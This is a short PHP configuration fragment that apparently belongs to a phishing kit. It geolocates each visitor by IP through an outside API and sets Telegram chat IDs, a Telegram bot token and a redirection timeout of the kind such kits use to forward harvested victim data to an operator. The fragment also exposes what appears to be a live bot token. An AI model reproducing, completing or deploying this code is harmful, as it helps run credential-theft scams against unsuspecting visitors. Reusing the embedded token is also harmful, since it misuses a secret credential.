<?php
function getVisitorIP() {
    if (isset($_SERVER['HTTP_CLIENT_IP'])) {
        return $_SERVER['HTTP_CLIENT_IP'];
    } elseif (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
        return $_SERVER['HTTP_X_FORWARDED_FOR'];
    } else {
        return $_SERVER['REMOTE_ADDR'];
    }
}
$ip = getVisitorIP();
$api_url = "http://ip-api.com/json/" . urlencode($ip);
$ch = curl_init($api_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($ch);
curl_close($ch);
if ($response === false) {
    die('Error occurred while fetching data from the API');
}
$data = json_decode($response);
$isp = isset($data->isp) ? $data->isp : 'Unknown';
$country = isset($data->country) ? $data->country : 'Unknown';
$city = isset($data->city) ? $data->city : 'Unknown';
$folder = 'id';
$timer = "45";
$randomId = uniqid(); 
$str = rand();
$randString = bin2hex(random_bytes(16));
$vuesChatId = "-507665661305"; // vues chat id 
$chatId = "-5227383235"; // chat id 
$botToken = "8595749855:AAEOVPAwVklh_rJEvzc40EnRW9X42e2cJMs"; // bot token
$securityQuestionTimeout = 20; // time out kbal redirection auto
?>